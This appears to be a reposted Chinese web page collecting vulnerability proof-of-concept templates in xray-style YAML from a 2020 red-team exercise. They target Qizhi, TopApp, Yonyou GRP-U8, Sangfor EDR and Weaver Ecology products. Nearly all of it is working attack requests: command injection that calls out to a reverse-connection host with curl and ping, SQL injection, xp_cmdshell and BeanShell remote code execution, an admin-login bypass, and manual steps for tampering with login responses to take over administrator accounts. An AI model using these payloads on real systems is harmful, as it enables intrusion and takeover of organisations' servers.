赞
踩
link:2020护网中的漏洞复现
name: poc-yaml-qzblj-java-CNVD-2019-20835 set: reverse: newReverse() reverseURL: reverse.url rules: - method: POST path: /shterm/listener/tui_update.php body: | ["t';import os;os.popen('curl+{{reverseURL}}')#"] expression: | reverse.wait(5) detail: author: HWHXY links: - https://my.oschina.net/u/4322686/blog/3448771
name: poc-yaml-trx-TopApp-sqli set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: POST path: >- /acc/clsf/report/datasource.php body: >- t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,md5(666),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。 expression: | response.status == 200 && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") detail: author: MaxSecurity(https://github.com/MaxSecurity) links: - https://www.weaver.com.cn/
name: poc-yaml-trx-TopAPP-rce set: reverse: newReverse() reverseURL: reverse.url rules: - method: POST path: /login_check.php headers: Content-Type: application/x-www-form-urlencoded body: >- userName=; ping {{reverseURL}}; echo&password=1&x=29&x=16 follow_redirects: true expression: | response.status == 200 && reverse.wait(5) detail: author: HWHXY links: - https://blog.csdn.net/Adminxe/article/details/108744908
name: poc-yaml-yonyou-grp-u8-sqli-to-rce set: r1: randomInt(1000, 9999) r2: randomInt(1000, 9999) rules: - method: POST path: /Proxy follow_redirects: false body: | cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'set/A {{r1}}*{{r2}}'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET> expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: MrP01ntSun(https://github.com/MrPointSun) links: - https://www.hackbug.net/archives/111.html
随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录,直接请求接口:/webapi/v1/system/accountmanage/account
POST /?module=auth_user&action=mod_edit_pwd
HOST:xxxxxxxxxxxxx
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
name: poc-yaml-sangfor-edr-arbitrary-admin-login
rules:
- method: GET
path: /ui/login.php?user=admin
follow_redirects: false
expression: >
response.status == 302 &&
response.body.bcontains(b"/download/edr_installer_") &&
response.headers["Set-Cookie"] != ""
detail:
author: hilson
links:
- https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA
name: poc-yaml-sangfor-edr-tool-rce
set:
r1: randomLowercase(8)
r2: randomLowercase(8)
rules:
- method: GET
path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}"
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: cookie
links:
- https://edr.sangfor.com.cn/
name: poc-yaml-sangfor-edr-rce set: reverse: newReverse() reverseURL: reverse.url rules: - method: POST path: "/api/edr/sanforinter/v2/cssp/slog_client?token=e21kNTp0cnVlfQ==" follow_redirects: false body: | {"params":"w=123\"'1234123'\"|ping {{reverse.url}}"} expression: | response.status == 200 && reverse.wait(5) detail: author: HWHXY links: - https://edr.sangfor.com.cn/
name: poc-yaml-ecology-javabeanshell-rce set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: POST path: /weaver/bsh.servlet.BshServlet body: >- bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw follow_redirects: false expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: l1nk3r links: - https://www.weaver.com.cn/cs/securityDownload.asp
name: poc-yaml-ecology-workflowcentertreedata-sqli set: r1: randomInt(4000, 9999) r2: randomInt(800, 1000) rules: - method: POST path: /mobile/browser/WorkflowCenterTreeData.jsp headers: Content-Type: application/x-www-form-urlencoded body: >- node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,({{r1}}*{{r2}})+order+by+(((1 follow_redirects: true expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: JingLing(https://hackfun.org/) links: - https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html - https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。